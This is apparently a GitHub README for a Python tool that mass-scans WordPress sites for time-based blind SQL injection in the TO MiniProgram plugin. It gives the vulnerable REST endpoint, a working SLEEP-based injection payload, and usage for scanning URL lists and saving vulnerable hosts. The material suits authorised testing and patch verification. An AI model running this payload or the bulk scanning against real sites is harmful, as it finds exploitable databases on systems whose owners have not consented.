A specialized SQL injection scanner targeting WordPress sites with the TO MiniProgram plugin vulnerable endpoint.
- 🚀 High-performance scanning with multi-threading support
- 🎯 Accurate detection of time-based blind SQL injection vulnerabilities
- 📋 Multiple target support (single URL or file with URL list)
- 📊 Clear reporting with color-coded results
- 💾 Automatic saving of vulnerable targets to vulnerable.txt
- 
Clone the repository: git clone https://github.com/HackfutSec/SQLwp.git cd SQLwp
- 
Install required dependencies: pip3 install -r requirements.txt 
python3 scanner.py -u http://target-site.com -d 5python3 scanner.py -l targets.txt -t 10 -d 5| Option | Description | Default | 
|---|---|---|
| -u,--url | Single target URL | - | 
| -l,--list | File containing list of target URLs | - | 
| -d,--delay | Sleep time for time-based detection (in seconds) | 5 | 
| -t,--threads | Number of concurrent threads | 5 | 
The scanner checks for SQL injection in the TO MiniProgram WordPress plugin's endpoint:
/wp-json/watch-life-net/v1/comment/getcomments
The scanner sends a time-based blind SQL injection payload:
DESC,(SELECT(1)FROM(SELECT(SLEEP(5)))a)--- The scanner measures response time
- If response time exceeds the specified delay, vulnerability is confirmed
Contributions are welcome! Please open an issue or pull request for:
- Bug fixes
- Feature enhancements
- Documentation improvements
This project is licensed under the MIT License - see the LICENSE file for details.
- GitHub: @HackfutSec
- For security concerns: HackfutSec404@proton.com
🔒 Happy (ethical) hacking! 🔒